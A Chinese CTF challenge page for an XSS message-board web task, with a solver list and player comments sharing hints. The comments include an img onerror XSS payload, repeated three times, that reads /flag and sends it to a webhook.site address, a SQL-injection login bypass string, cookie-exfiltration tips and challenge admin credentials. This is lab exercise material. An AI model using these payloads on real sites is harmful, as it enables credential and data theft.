留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
3476
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评分(20)
解题动态
ccc_ 攻破了该题 15小时前
MJT 攻破了该题 16小时前
C071 攻破了该题 1天前
ggsea 攻破了该题 5天前
青春小豆 攻破了该题 5天前
awesome 攻破了该题 5天前
五彩星云 攻破了该题 5天前
tcas 攻破了该题 5天前
Star666 攻破了该题 6天前
KDAtc 攻破了该题 6天前
jvfnvd.vl 攻破了该题 6天前
乔qiao 攻破了该题 8天前
小石 攻破了该题 8天前
light1014 攻破了该题 9天前
风掠 攻破了该题 10天前
zoolip 攻破了该题 11天前
Terrenc44 攻破了该题 11天前
pwnkiller018 攻破了该题 12天前
Vluae 攻破了该题 13天前
评论
小石 8天前
举报
进入admin.php后,刷新不会弹出对话框,自己进去调试界面看一下cookie即可。
Terrenc44 11天前
举报
不用xss,dns外带一下,一样可以的
追风的牛牛 23天前
举报
笑死了,他把db那个数据库路径删除了
song..22 2月前
举报
<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">
song..22 2月前
举报
<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">
song..22 2月前
举报
<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">
Gcysnd 3月前
举报
挺容易,挖到admin后台/admin.php用1' or '1' = '1' --万能用户名登录后发现存在html注入点,于是聊天室发送<script>alert(cookie)</scirpt>找到flag
xxsko 3月前
举报
万能用户名你可以?我用你这个也不行1' or '1' = '1' --万能用户名
2333m 3月前
举报
触发xss需要登录后台/admin.php, admin/011be4d65feac1a8 (通过翻评论区找到的,据说是dirsearch跑出来admin.php和db.sql,但是我没找到)
YS_JW 4月前
举报
我在img图片位置直接插入http://{ceye平台}/?cookie='+document.cookie+',ceye那边有回显,但是cookie没有被带出来,直接以?cookie=\%27+document.cookie+\%27形式返回了,去掉'后也是直接以document.cookie字符返回,这是为啥哦,问ai也没问出来原因
BLX123 7月前
举报
想用python的h(ttp)协议来接收xss,自身得是一个公网IP反弹才能定位到自己